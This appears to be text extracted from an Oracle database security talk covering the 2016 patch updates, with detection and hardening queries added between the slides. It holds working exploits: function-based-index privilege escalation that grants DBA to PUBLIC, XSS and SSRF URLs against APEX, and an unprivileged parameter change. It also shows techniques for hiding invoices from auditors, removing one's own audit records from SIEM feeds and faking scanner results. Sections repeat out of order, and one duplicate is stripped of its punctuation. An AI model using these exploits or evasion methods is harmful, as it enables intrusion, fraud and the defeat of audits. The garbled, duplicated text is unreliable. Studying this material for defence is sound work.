CREATE OR REPLACE FUNCTION wmsys.GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant select on sys.link$ to public';
  COMMIT;
  RETURN FOO;
END;
/
SQL> grant execute on wmsys.getdba to public;

-- now we create the index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(WMSYS.GETDBA('AK'));
August 2016
Hackproofing Oracle's eBusiness Suite by David Litchfield
Presentation + supporting documents:
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5.pdf

September 2016
Nothing special happened
October 2016
Oracle CPU October 2016
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html

October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 9.1)
2 Kernel PDB (CVSS 6.4, 6.0)
3 RDBMS Security (CVSS 6.4, 3.3, 3.3)
1 APEX (CVSS 6.1, remote)
1 RDBMS Security & SQL*Plus (CVSS 2.4)
Oct 2016 CPU - CVE-2016-5497
Problem: UNSALTED MD5 HASH STILL PRESENT IN 12C DATABASE (DIGEST VERIFIER)
Shown as an open problem at the DOAG 2015 presentation
Reporter: Alexander Kornbrust

Oracle Password Hash 12.1.0.2+
Oracle 12.1.0.2 introduced a new PBKDF2 / SHA-512 based algorithm.
The new "T:" password hash is 10 times slower than the old DES hash (Oracle 7+) and 88 times slower than the SHA-1-based hash (Oracle 11+).
The new algorithm is known and already implemented in some tools.
Remark: Microsoft Office 2013 is 10 times more time consuming to crack than the new Oracle PBKDF2.

Oracle Password Hash 12.1.0.2+
Let's have a look at RFC 2617:
KD(secret, data) = H(concat(secret, ":", data))
No salt, but a secret:
Secret = 'XDB'
and the hash will be MD5(XDB:tiger),
stored in the spare4 column starting with "H:" (the H hash).
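A review query for the verifier types the slide describes, added here and not part of the deck. It assumes a 12.1.0.2 database and a SYSDBA session (SYS.USER$ is not visible to ordinary DBAs); the "H:", "S:" and "T:" prefixes are the ones the slides name, and TYPE# = 1 selects user accounts (0 would be roles).

```sql
-- Added example (not from the slide deck): which accounts still carry the unsalted
-- HTTP-Digest verifier ("H:") next to the SHA-1 ("S:") and PBKDF2 ("T:") verifiers.
-- Assumes 12.1.0.2 and SYSDBA; the prefixes are the ones the slides name.
SELECT u.name,
       CASE WHEN u.spare4 LIKE '%H:%' THEN 'YES' ELSE 'no' END AS md5_digest_h,
       CASE WHEN u.spare4 LIKE '%S:%' THEN 'YES' ELSE 'no' END AS sha1_s,
       CASE WHEN u.spare4 LIKE '%T:%' THEN 'YES' ELSE 'no' END AS pbkdf2_t,
       CASE WHEN u.password IS NOT NULL THEN 'YES' ELSE 'no' END AS des_10g,
       DECODE(u.astatus, 0, 'OPEN', 'LOCKED / EXPIRED / OTHER') AS status
  FROM sys.user$ u
 WHERE u.type# = 1
 ORDER BY md5_digest_h DESC, u.name;

-- Cross-check with the supported view: PASSWORD_VERSIONS lists 10G / 11G / 12C per user
-- and needs no access to SYS.USER$.
SELECT username, password_versions, account_status
  FROM dba_users
 ORDER BY username;
```

Which verifier versions the server writes is governed by SQLNET.ALLOWED_LOGON_VERSION_SERVER in sqlnet.ora, and a verifier that is already stored only disappears when that account's password is next changed. Run the query before the CPU, after the CPU and again after the password resets to see which of the "H:" entries the fix actually removed.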
Oct 2016 CPU - CVE-2016-5516
Problem: In Oracle 12c the DBMS_PDB_EXEC_SQL procedure is a wrapper for the DBMS_PDB.EXEC_AS_ORACLE_SCRIPT procedure, which executes SQL as the SYS user. The XDB user has the execute privilege on DBMS_PDB_EXEC_SQL and, as such, by first exploiting a vulnerability in a publicly executable XDB-owned PL/SQL object, an attacker can leverage this privilege to execute SQL as SYS. The fix changes both DBMS_PDB_EXEC_SQL and DBMS_PDB from the DEFINER rights to the INVOKER rights execution model.
Reporter: David Litchfield
Oct 2016 CPU - CVE-2016-5604
Problem: Privilege Escalation in Oracle Cloud Control (12.1.3)
Reporter: Alexander Kornbrust

$ sqlplus sysman_apm/rds@ora1
SQL> desc dba_users
ERROR:
ORA-04043: object SYS.DBA_USERS does not exist

==> The user does not have the privilege to access DBA_USERS
SQL> select * from user_sys_privs;
USERNAME     PRIVILEGE             ADM
------------ --------------------- ---
SYSMAN_APM   UNLIMITED TABLESPACE  NO
SYSMAN_APM   CREATE VIEW           NO
SYSMAN_APM   CREATE ANY LIBRARY    NO
SYSMAN_APM   CREATE SEQUENCE       NO
SYSMAN_APM   CREATE TABLE          NO
SYSMAN_APM   CREATE LIBRARY        NO
SYSMAN_APM   CREATE ANY INDEX      NO

==> The CREATE ANY LIBRARY privilege is granted to SYSMAN_APM
SQL> select * from user_role_privs;
USERNAME     GRANTED_ROLE  ADM DEF OS_
------------ ------------- --- --- ---
SYSMAN_APM   CONNECT       NO  YES NO
SYSMAN_APM   RESOURCE      NO  YES NO

==> Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  2    PRAGMA AUTONOMOUS_TRANSACTION;
  3  BEGIN
  4    execute immediate 'grant dba to public';
  5    COMMIT;
  6    RETURN FOO;
  7  END;
  8  /

==> Grant execution privileges to PUBLIC
SQL> grant execute on getdba to public;

==> Create an index on SYSTEM.HELP using a function based index (FBI). The function getdba is used for the function based index.
SQL> CREATE INDEX EXPLOIT_INDEX ON SYSTEM.HELP(SYSMAN_APM.GETDBA('AK2'));

==> Reconnect is necessary
SQL> select * from dba_role_privs where granted_role='DBA' and grantee='PUBLIC';
GRANTEE   GRANTED_ROLE  ADM DEF
--------- ------------- --- ---
PUBLIC    DBA           NO  YES
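Detection queries for the INDEX-privilege / function-based-index escalation path that both CVE-2016-3489 and CVE-2016-5604 use. This is an added example, not from the slide deck and not Oracle's fix; it runs as a DBA, and the index, function and schema names it mentions (EXPLOIT_INDEX, GETDBA, INCEXP/INCFIL/INCVID, WMSYS, SYSMAN_APM) are the ones the two transcripts show. The commented REVOKEs at the end are an assumption about what can be removed and need testing on the system in question.

```sql
-- Added example (not from the slide deck): detection queries for the INDEX-privilege /
-- function-based-index escalation shown for CVE-2016-3489 and CVE-2016-5604.
-- Run as a DBA. Names are the ones the slides use; nothing here is Oracle's own fix.

-- 1. Who may create indexes on SYS- or SYSTEM-owned tables?
--    The slides show the legacy INDEX grants on INCEXP/INCFIL/INCVID to SYSTEM (11g)
--    and CREATE ANY INDEX held by WMSYS (12c) and SYSMAN_APM (Cloud Control).
SELECT grantee, owner || '.' || table_name AS target, privilege
  FROM dba_tab_privs
 WHERE privilege = 'INDEX'
   AND owner IN ('SYS', 'SYSTEM')
   AND grantee <> owner
UNION ALL
SELECT grantee, '(any table)', privilege
  FROM dba_sys_privs
 WHERE privilege = 'CREATE ANY INDEX'
 ORDER BY 1, 2;

-- 2. Function-based indexes on SYS/SYSTEM tables. An index expression that calls a
--    function owned by a third schema is the pattern of both CVEs: while the index is
--    built, the function runs under the table owner's identity. COLUMN_EXPRESSION is a
--    LONG column, so review the expression text by eye rather than filtering it in SQL.
SELECT i.owner AS index_owner, i.index_name, i.table_owner, i.table_name,
       e.column_expression
  FROM dba_indexes i
  JOIN dba_ind_expressions e
    ON e.index_owner = i.owner
   AND e.index_name  = i.index_name
 WHERE i.index_type LIKE 'FUNCTION-BASED%'
   AND i.table_owner IN ('SYS', 'SYSTEM')
 ORDER BY i.table_owner, i.table_name, i.index_name;

-- 3. Outcome of a successful escalation in both transcripts: a powerful role or a
--    SYS base table granted to PUBLIC. Compare against a baseline taken after installation.
SELECT 'ROLE' AS kind, granted_role AS what
  FROM dba_role_privs
 WHERE grantee = 'PUBLIC'
   AND granted_role IN ('DBA', 'IMP_FULL_DATABASE', 'EXP_FULL_DATABASE')
UNION ALL
SELECT 'OBJECT', owner || '.' || table_name || ' (' || privilege || ')'
  FROM dba_tab_privs
 WHERE grantee = 'PUBLIC'
   AND owner = 'SYS'
   AND table_name LIKE '%$';

-- 4. 12c only: who may inherit SYS/SYSTEM privileges when those users run a
--    CURRENT_USER function. SYSTEM losing INHERIT ANY PRIVILEGES is what produced the
--    ORA-06598 on 12.1.0.2 in the transcript above.
SELECT grantee, privilege, '(any user)' AS on_user
  FROM dba_sys_privs
 WHERE privilege = 'INHERIT ANY PRIVILEGES'
UNION ALL
SELECT grantee, privilege, table_name
  FROM dba_tab_privs
 WHERE privilege = 'INHERIT PRIVILEGES'
   AND table_name IN ('SYS', 'SYSTEM')
 ORDER BY 1;

-- Mitigation (assumption: the legacy INDEX grants are unused on this system; test first):
-- REVOKE INDEX ON sys.incexp FROM system;
-- REVOKE INDEX ON sys.incfil FROM system;
-- REVOKE INDEX ON sys.incvid FROM system;
```

Query 2 returns the index that both transcripts create, and query 3 returns what it left behind (SYS.LINK$ readable by PUBLIC, or DBA granted to PUBLIC), so the pair also works as a quick post-incident check when a database has been exposed to either CVE before patching.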
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic

Scenario 1
A top manager comes to the office of the DBA and asks you: "Tomorrow the auditor from the tax authority will come to check our invoices. Could you hide the 10000 EUR invoice from the last party at the night club, just from the auditor? I will increase your salary..."

Scenario 2
Remove your own audit entries from the audit log which is retrieved by the SIEM solution (e.g. Splunk, QRadar, ...) via JDBC.

Scenario 3
You don't have time to harden all your databases, but the security department wants to see results. Instead of fixing the problem you will just deliver the proper results.

A lot of different wishes...
but luckily we are using Oracle.
Problem & Solution
Oracle offers different features to fulfill these wishes without affecting other users...
All these scenarios have in common that we have to manipulate SQL statements.

"Select value ..."
Oracle Data Redaction allows masking / manipulating the selected data just for a single database user.
Possible usage: replace true/false, replace USER/ADMIN... the DBA can decide what will be returned.

"Select value ..."
A typical query from security checklists/scanners looks like this:
select upper(value) from parameter where upper(name) = 'XYZ'
The tool expects the value TRUE, but it contains FALSE.
Oracle Data Redaction allows you to change the result value from FALSE to TRUE.
==> The audit department is happy because the database passes all the security checks...
"... from table/view ..."
Modifying objects can be used as a man-in-the-middle as well.
Possible approaches:
modify views (e.g. add spare1 != 'DBA1' to the view dba_audit_trail). All entries of the OSUSER DBA1 will be removed from the view. If a SIEM solution retrieves the audit data, the entries of DBA1 are not retrieved.
create or change synonyms to "redirect" objects
replace a table with a view + INSTEAD OF trigger

----- dbms_macadm -----
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN
    RETURN 'N';
  END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN
    RETURN 'N';
  END IF;
  RETURN 'Y';
END;

SQL> create or replace view mydual as select 'X' as dummy from dual where user != 'DVSYS';
SQL> grant select on sys.mydual to public;
SQL> drop public synonym dual;
SQL> create public synonym dual for sys.mydual;

SYS CAN INFLUENCE DVSYS ANALYSIS VIA A VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank ("The catastrophe in the database", Gunther Pipperr)
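The same check written so that the lookup cannot be redirected through a synonym named DUAL, which is the "use fully qualified names" countermeasure the deck lists further down. This is an added example, not the deck's code and not Oracle's fix for CVE-2016-3484: the function name is constructed for illustration, DVSYS.DV_SQL_TEXT is the Database Vault function the slide shows, and the fail-closed handling is an assumption about the desired behaviour, not Oracle's.

```sql
-- Added example (not from the slide deck, not Oracle's fix for CVE-2016-3484):
-- the slide's check rewritten so that no unqualified object name is left to hijack.
-- DVSYS.DV_SQL_TEXT is the function shown on the slide; the function name below is
-- constructed. Create it in the schema that owns the original check.

-- Vulnerable pattern (as on the slide): the unqualified DUAL resolves through the
-- public synonym, which SYS can point at any view it likes.
--   SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;

CREATE OR REPLACE FUNCTION check_backup_parm_varchar_hardened RETURN VARCHAR2 IS
  tmp  VARCHAR2(32767);
  tmp2 VARCHAR2(32767);
BEGIN
  -- A PL/SQL function call needs no SELECT at all, so there is no table reference
  -- left to redirect. Where a query is unavoidable, write FROM SYS.DUAL, never FROM DUAL.
  tmp := DVSYS.DV_SQL_TEXT;

  -- Fail closed: no statement text, or text long enough to have been truncated,
  -- is treated as "not allowed" (the slide's version denies only at exactly 4000).
  IF tmp IS NULL OR LENGTH(tmp) >= 4000 THEN
    RETURN 'N';
  END IF;

  tmp2 := UPPER(tmp);
  IF tmp2 LIKE '%RECYCLEBIN%' AND tmp2 LIKE '%ON%' THEN
    RETURN 'N';
  END IF;
  RETURN 'Y';
EXCEPTION
  WHEN OTHERS THEN
    -- Any error inside the check (NO_DATA_FOUND from a hijacked DUAL, a revoked
    -- privilege, ...) must deny rather than silently allow.
    RETURN 'N';
END;
/
```

The exception handler is the part that matters against the DUAL trick: with the slide's original code, a view that returns no row for DVSYS turns the check into an unhandled NO_DATA_FOUND, and whether that ends up as "allowed" or "denied" depends entirely on the caller.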
"... where x=y"
Where conditions can be changed using VPD.
VPD: add the where clause invoice_name != 'SAUNA_CLUB CHANTAL'
Hide "certain" invoices from the audit department.

"Select value from table/view where x=y"
The SQL Translation Framework (12c only) allows replacing an entire query: the user submits query A, the SQL Translation Framework replaces query A with query B.
Possible Countermeasures for paranoid Auditors
Add a random string (e.g. aksdjhiuz) to avoid the SQL Translation Framework (new SQL_ID)
Try to get EXEMPT ACCESS POLICY to disable VPD (even if not used in the application)
Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL)
Always check the object type (is it really a table?)
Use checksums for certain database objects (especially views)
Check the current schema to avoid attacks (e.g. alter session set current_schema=otheruser)
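The countermeasures above turned into review queries a DBA or auditor can run. This is an added example, not from the slide deck; the object names it checks (DUAL, USER$, DBA_AUDIT_TRAIL) are the ones the slides discuss, the list of views to fingerprint is a constructed starting point, and step 4 assumes 12c (DBMS_CRYPTO.HASH_SH256 does not exist in 11g) plus EXECUTE on DBMS_CRYPTO. Nothing here is the deck's or Oracle's own tooling.

```sql
-- Added example (not from the slide deck): review queries that turn the countermeasures
-- above into checks. Run as a DBA; step 4 needs EXECUTE on DBMS_CRYPTO and 12c.
-- The view list in step 4 is a constructed starting point, extend it per application.

-- 1. Fully qualified names: DUAL must still be the public synonym for SYS.DUAL,
--    and SYS.DUAL must be a table, not a view somebody created in its place.
SELECT s.owner, s.synonym_name, s.table_owner, s.table_name, o.object_type
  FROM dba_synonyms s
  LEFT JOIN dba_objects o
         ON o.owner = s.table_owner
        AND o.object_name = s.table_name
 WHERE s.synonym_name = 'DUAL';
-- Expected: exactly one row, PUBLIC / DUAL -> SYS / DUAL / TABLE.

-- 2. Object type: dictionary objects that are not the type the application assumes,
--    and views carrying an INSTEAD OF trigger (the table-replaced-by-view trick).
SELECT owner, object_name, object_type
  FROM dba_objects
 WHERE owner = 'SYS'
   AND object_name IN ('DUAL', 'USER$')
   AND object_type <> 'TABLE';
-- Expected: no rows on a default installation.

SELECT owner, trigger_name, table_owner, table_name
  FROM dba_triggers
 WHERE trigger_type = 'INSTEAD OF'
 ORDER BY table_owner, table_name;

-- 3. Features that change results without changing the statement text. Everything
--    listed here should be known to, and approved by, the application owner.
SELECT 'VPD' AS feature, object_owner || '.' || object_name AS target, policy_name AS detail
  FROM dba_policies
 WHERE enable = 'YES'
UNION ALL
SELECT 'DATA REDACTION', object_owner || '.' || object_name, policy_name
  FROM redaction_policies
UNION ALL
SELECT 'SQL TRANSLATION', owner || '.' || profile_name, translator
  FROM dba_sql_translation_profiles
 ORDER BY 1, 2;

-- Who is exempt from VPD already (the privilege the slide suggests auditors ask for):
SELECT grantee FROM dba_sys_privs WHERE privilege = 'EXEMPT ACCESS POLICY';

-- 4. Checksums for views: record the fingerprint once, compare it on every review.
SET SERVEROUTPUT ON
BEGIN
  FOR v IN (SELECT owner, view_name
              FROM dba_views
             WHERE owner = 'SYS'
               AND view_name IN ('DBA_AUDIT_TRAIL', 'DBA_USERS',
                                 'DBA_ROLE_PRIVS', 'DBA_SYS_PRIVS'))
  LOOP
    DBMS_OUTPUT.PUT_LINE(
      v.owner || '.' || v.view_name || ' ' ||
      RAWTOHEX(DBMS_CRYPTO.HASH(
        DBMS_METADATA.GET_DDL('VIEW', v.view_name, v.owner),
        DBMS_CRYPTO.HASH_SH256)));
  END LOOP;
END;
/

-- 5. Current schema: unqualified names resolve against CURRENT_SCHEMA, so a session
--    that was switched with ALTER SESSION SET CURRENT_SCHEMA sees different objects.
SELECT SYS_CONTEXT('USERENV', 'SESSION_USER')   AS session_user,
       SYS_CONTEXT('USERENV', 'CURRENT_SCHEMA') AS current_schema
  FROM SYS.DUAL;
-- Expected: both columns equal unless the application switched schema on purpose.
```

Step 4 hashes the DDL text that DBMS_METADATA returns, so the stored fingerprint changes on any edit to the view, including a one-token predicate like the spare1 filter the slide adds to DBA_AUDIT_TRAIL; keep the recorded values outside the database, otherwise the same DBA can update them along with the view.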
Modifying Queries on the fly
Powerful features for applications
(Huge) potential on critical systems to modify application logic (e.g. DB Vault)
DBAs and auditors / the security department should be aware of powerful Oracle features which could be used to modify application logic
Audit these features even if they are not in use
Trends 2017
New hardening documents for Oracle 12.2 required (new features, new packages, ...)
Migration to 12.2
More auditing projects
Integration of auditing with SIEM solutions

Q & A
Thank you
Contact:
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Apr 2016 CPU - CVE-2016-0691
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: When a SELECT calls a function the user is not allowed to execute (no EXECUTE privilege), the audit record does not log the name of the function, only the name of the table used in the query.
Reporter: David Litchfield
Exploit: obvious (Create Java Source …)
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
July 2016 CPU
9 security fixes (5 remotely exploitable)
1 OJVM (CVSS 9.0)
1 JDBC (CVSS 8.1, remote)
1 Portable Clusterware (CVSS 7.5, remote)
1 Data Pump (CVSS 6.7)
2 APEX (CVSS 6.1, 5.8, both remote)
1 RDBMS Security (CVSS 5.3, remote)
1 DB Sharding (CVSS 4.4)
1 Database Vault (CVSS 3.4)
Jul 2016 CPU - CVE-2016-3448
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: The HTMLDB_UTIL PL/SQL package is vulnerable to an XSS flaw. To reach it, the schema (APEX_050000) has to be named explicitly in the URL, because the config file only whitelists "apex" (the package is reached through the real schema name instead).
Reporter: David Litchfield
Exploit:
http://example.com/ords/apex_050000.htmldb_util.JSON_FROM_ARRAY?P_COLS=1&P_NAME01=XX%22%3E%3CH1%3EOops%3C/H1%3E&P_F01=Y&P_ROWS=1
Jul 2016 CPU - CVE-2016-3467
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: APEX 5 is vulnerable to a server-side request forgery flaw, i.e. it can be made to connect to another web server and port regardless of whether allowed URLs have been configured. For example, the request below will connect to someotherserver on the given port and POST "X" as the payload. This can be used as a port-scanning mechanism and to attack systems protected by a firewall, etc.
Reporter: David Litchfield
Exploit:
http://example/ords/apex_050000.WWV_FLOW_WEBSERVICES_API.MAKE_REQUEST?P_URL=http://someotherserver:port&p_envelope=X
Jul 2016 CPU - CVE-2016-3488
Problem: The package dbms_gsm_common lets a user without the administrative privilege (ALTER SYSTEM) change database parameters, and without the instance restart that a static parameter such as O7_DICTIONARY_ACCESSIBILITY normally requires.
Reporter: Bruno Cirone
Exploit:
exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY', 'TRUE')

-- as SYS
SQL> select name, value from v$parameter where name = 'O7_DICTIONARY_ACCESSIBILITY';
O7_DICTIONARY_ACCESSIBILITY   FALSE
-- as user GSMUSER
SQL> exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY', 'TRUE')
PL/SQL procedure successfully completed.
-- as SYS, re-run after the package call
SQL> select name, value from v$parameter where name = 'O7_DICTIONARY_ACCESSIBILITY';
O7_DICTIONARY_ACCESSIBILITY   TRUE
July 2016 CPU - CVE-2016-3484
Problem: SYS CAN INFLUENCE DVSYS ANALYSIS
Reporter: Alexander Kornbrust
Problem (details + exploit later …): the Database Vault check below reads the statement text through an unqualified DUAL, so whatever object the name DUAL resolves to decides the outcome of the check.
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN RETURN 'N'; END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
  RETURN 'Y';
END;
July 2016 CPU - CVE-2016-3489
Problem: Privilege escalation via the INDEX object privilege and a function-based index (FBI). The index expression is evaluated with the privileges of the table owner (here SYS), so an AUTHID CURRENT_USER function called from the expression runs as SYS while the index is built.
Reporter: Alexander Kornbrust

July 2016 CPU - CVE-2016-3489
-- Oracle 11.2.0.4, as SYSTEM
SQL> select grantee, owner, table_name from dba_tab_privs
     where privilege = 'INDEX' and grantee <> owner and owner = 'SYS';
GRANTEE   OWNER   TABLE_NAME
--------  ------  ----------
SYSTEM    SYS     INCEXP
SYSTEM    SYS     INCFIL
SYSTEM    SYS     INCVID

SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
       PRAGMA AUTONOMOUS_TRANSACTION;
     BEGIN
       execute immediate 'grant select on sys.link$ to public';
       COMMIT;
       RETURN FOO;
     END;
     /
SQL> grant execute on getdba to public;

July 2016 CPU - CVE-2016-3489
==> SYSTEM does not have access to the table SYS.LINK$:
SQL> select count(*) from sys.link$;
ERROR at line 1:
ORA-01031: insufficient privileges
==> executing getdba directly throws an error, too:
SQL> select getdba('i') from dual;
ERROR at line 1:
ORA-01031: insufficient privileges
ORA-06512: at "SYSTEM.GETDBA", line 4
==> Now create a function-based index on the table sys.incvid:
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('AK'));
Index created.
SQL> select count(*) from sys.link$;
  COUNT(*)
----------
        11

July 2016 CPU - CVE-2016-3489
-- Oracle 12.1.0.2 (SYSTEM no longer has INHERIT ANY PRIVILEGES)
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('1'));
CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('1'))
ERROR at line 1:
ORA-06598: insufficient INHERIT PRIVILEGES privilege
ORA-06512: at "SYSTEM.GETDBA", line 1
-- On 12.1.0.2 the user WMSYS has CREATE ANY INDEX, and the SYSTEM user can use
-- CREATE ANY PROCEDURE to create the function in the schema of WMSYS:
CREATE OR REPLACE FUNCTION wmsys.GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant select on sys.link$ to public';
  COMMIT;
  RETURN FOO;
END;
/
SQL> grant execute on wmsys.getdba to public;
-- now create the index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(WMSYS.GETDBA('AK'));
August 2016
Hackproofing Oracle's eBusiness Suite by David Litchfield
Presentation + supporting documents:
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5.pdf
September 2016
Nothing special happened
October 2016
Oracle CPU October 2016
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
October 2016 CPU
9 security fixes (1 remotely exploitable)
1 OJVM (CVSS 9.1)
2 Kernel PDB (CVSS 6.4, 6.0)
3 RDBMS Security (CVSS 6.4, 3.3, 3.3)
1 APEX (CVSS 6.1, remote)
1 RDBMS Security & SQL*Plus (CVSS 2.4)
Oct 2016 CPU - CVE-2016-5497
